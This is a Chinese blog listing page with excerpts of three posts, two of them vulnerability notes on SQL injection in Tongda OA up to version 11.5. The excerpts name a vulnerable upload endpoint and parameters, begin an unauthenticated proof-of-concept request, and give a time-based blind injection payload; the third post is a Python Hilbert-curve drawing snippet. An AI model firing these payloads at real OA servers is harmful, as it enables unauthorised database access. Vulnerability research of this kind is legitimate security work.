2020年8月25日
通达OA<=11.5版本SQL注入——附件上传
摘要: SQL注入 POC(11.5版本无需登录) 漏洞参数:SORT_ID,FILE_SORT 审计版本:通达OA 11.5 POST /general/file_folder/swfupload_new.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 1 阅读全文
posted @ 2020-08-25 10:14 r1ch4rd_L 阅读(636) 评论(0) 推荐(0)
通达OA<=11.5版本SQL注入——日程安排
摘要: 注入点产生位置 注入payload 1593360000' AND if((1<0),SLEEP(0),sleep(2)) and '1 不产生延迟 产生延迟 阅读全文
posted @ 2020-08-25 10:13 r1ch4rd_L 阅读(196) 评论(0) 推荐(0)
希尔伯特曲线python3实现
摘要: 需要OpenGL库:https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyopengl #coding:utf-8 from OpenGL.GL import * from OpenGL.GLUT import * class fractal(object): 阅读全文
posted @ 2020-08-25 08:41 r1ch4rd_L 阅读(1090) 评论(0) 推荐(0)